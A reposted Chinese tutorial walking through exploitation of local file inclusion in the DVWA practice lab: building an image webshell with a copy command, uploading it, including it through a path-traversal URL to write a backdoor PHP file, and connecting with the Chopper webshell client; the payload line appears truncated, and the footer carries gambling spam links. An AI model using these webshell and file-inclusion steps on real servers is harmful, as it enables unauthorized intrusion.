安基网 欢乐生肖 安全 渗透测试 查看内容

本地文件包含漏洞

2020-2-10 13:44| 投稿: |来自:


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 一、本地文件包含漏洞:环境:DVWA,low级别1、制作一句话图片木马第一种方法:windows命令copy 1.jpg/b+1.php 2.jpg第二种方法:将照片拖入edjpgcom软件,添加下面这句话2、上传图片木马文件3、选择文件包含页面4、执行文件包含并生成后门192.168.152.188/dvwa/vulnerabilities/fi/?page=../../hackab ...

一、本地文件包含漏洞:

环境:DVWA,low级别

1、制作一句话图片木马

第一种方法:

windows命令

copy 1.jpg/b+1.php 2.jpg

第二种方法:

将照片拖入edjpgcom软件,添加下面这句话

')?>

2、上传图片木马文件

3、选择文件包含页面

4、执行文件包含并生成后门

192.168.152.188/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/1.jpg

5、在/var/www/dvwa/vulnerabilities/fi目录生成了1.php

6、菜刀链接

二、环境:DVWA,medium级别

同low级别

禁止非法,后果自负

欢迎关注公众号:web安全工具库



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/i6790271013683724813/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

相关阅读

最新评论

 最新
返回顶部
上海时时乐 广西快3 幸运飞艇官网 极速3分彩 王者彩票APP 广东11选5走势图 秒速快3 秒速快3 飞速赛车平台 幸运飞艇官网